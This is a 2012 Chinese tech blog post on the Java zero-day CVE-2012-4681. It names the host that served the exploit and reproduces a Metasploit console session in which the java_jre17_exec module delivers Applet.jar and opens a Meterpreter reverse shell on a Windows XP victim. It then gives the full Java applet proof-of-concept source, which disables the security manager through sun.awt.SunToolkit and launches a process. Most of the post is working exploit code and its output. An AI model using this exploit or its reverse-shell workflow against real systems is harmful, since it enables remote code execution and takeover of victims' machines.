Chinaunix首页 | 论坛 | 博客

visualvisual.blog.chinaunix.net

首页 |  博文目录 |  关于我

wjtvbm

  • 博客访问: 398326
  • 博文数量: 42
  • 博客积分: 1181
  • 博客等级: 少尉
  • 技术积分: 602
  • 用 户 组: 普通用户
  • 注册时间: 2012-02-28 22:19
文章分类

全部博文(42)

文章存档

2012年(42)

我的朋友
最近访客
推荐博文
相关博文
Java 0-day

分类: 网络与安全

2012-09-01 02:48:09

这次CVE-2012-4681最厉害的地方在于跨平台(, 这不正是Java的优点吗?)不管是哪一个平台哪一个浏览器都受到影响。

而且这次Oracle 终于破例在每季定期更新外提前推出更新修正CVE-2012-4681, CVE-2012-1682, CVE-2012-3136 CVE-2012-0547

而这次4681红的是ok.aa24.net ok.aa24.net 也早就被列为危险名单。

如果不理警告坚持要看的话就像这样


接下来Tracert 一下就会发现IP居然是中华电信的,这算是台湾之光吗? XDD


对了 meterpreter 已经有攻击包了喔  XDD


点击(此处)折叠或打开

  1. _ _
  2. / \ / \ __ _ __ /_/ __
  3. | |\ / | _____ \ \ ___ _____ | | / \ _ \ \
  4. | | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
  5. |_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
  6. |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
  9. =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
  10. + -- --=[ 996 exploits - 484 auxiliary - 148 post
  11. + -- --=[ 251 payloads - 27 encoders - 8 nops
  12. =[ svn r15451 updated 77 days ago (2012.06.11)
  14. Warning: This copy of the Metasploit Framework was last updated 77 days ago.
  15. We recommend that you update the framework at least every other day.
  16. For information on updating your copy of Metasploit, please see:
  19. msf > use exploit/multi/browser/java_jre17_exec
  20. msf exploit(java_jre17_exec) > exploit
  21. [*] Exploit running as background job.
  23. [*] Started reverse handler on 192.168.1.131:4444
  24. [*] Using URL:
  25. [*] Local IP:
  26. [*] Server started.
  27. msf exploit(java_jre17_exec) > [*] 192.168.1.132 java_jre17_exec - Java 7 Applet Remote Code Execution handling request
  28. [*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
  29. [*] 192.168.1.132 java_jre17_exec - Sending Applet.jar
  30. [*] Sending stage (30216 bytes) to 192.168.1.132
  31. [*] Meterpreter session 1 opened (192.168.1.131:4444 -> 192.168.1.132:1373) at Mon Aug 27 11:32:26 +0200 2012
  33. msf exploit(java_jre17_exec) > sessions -i 1
  34. [*] Starting interaction with 1...
  36. meterpreter > sysinfo
  37. OS : Windows XP 5.1 (x86)
  38. Computer : home-7f7a6a7e2e
  39. Meterpreter : java/java
  40. meterpreter >


点击(此处)折叠或打开

  1. //
  2. // CVE-2012-XXXX Java 0day
  3. //
  4. // reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
  5. //
  6. // secret host / ip : ok.aa24.net / 59.120.154.62
  7. //
  8. // regurgitated by jduck
  9. //
  10. // probably a metasploit module soon...
  11. //
  12. package cve2012xxxx;
  14. import java.applet.Applet;
  15. import java.awt.Graphics;
  16. import java.beans.Expression;
  17. import java.beans.Statement;
  18. import java.lang.reflect.Field;
  19. import java.net.URL;
  20. import java.security.*;
  21. import java.security.cert.Certificate;
  23. public class Gondvv extends Applet
  24. {
  26. public Gondvv()
  27. {
  28. }
  30. public void disableSecurity()
  31. throws Throwable
  32. {
  33. Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
  34. Permissions localPermissions = new Permissions();
  35. localPermissions.add(new AllPermission());
  36. ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
  37. AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
  38. localProtectionDomain
  39. });
  40. SetField(Statement.class, "acc", localStatement, localAccessControlContext);
  41. localStatement.execute();
  42. }
  44. private Class GetClass(String paramString)
  45. throws Throwable
  46. {
  47. Object arrayOfObject[] = new Object[1];
  48. arrayOfObject[0] = paramString;
  49. Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
  50. localExpression.execute();
  51. return (Class)localExpression.getValue();
  52. }
  54. private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
  55. throws Throwable
  56. {
  57. Object arrayOfObject[] = new Object[2];
  58. arrayOfObject[0] = paramClass;
  59. arrayOfObject[1] = paramString;
  60. Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
  61. localExpression.execute();
  62. ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
  63. }
  65. public void init()
  66. {
  67. try
  68. {
  69. disableSecurity();
  70. Process localProcess = null;
  71. localProcess = Runtime.getRuntime().exec("calc.exe");
  72. if(localProcess != null);
  73. localProcess.waitFor();
  74. }
  75. catch(Throwable localThrowable)
  76. {
  77. localThrowable.printStackTrace();
  78. }
  79. }
  81. public void paint(Graphics paramGraphics)
  82. {
  83. paramGraphics.drawString("Loading", 50, 25);
  84. }
  85. }

阅读(4318) | 评论(0) | 转发(0) |
0

上一篇:[PoC] 透过 JavaScript 远程攻陷 Intel Core2Duo

下一篇:关于 USSD 的漏洞

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6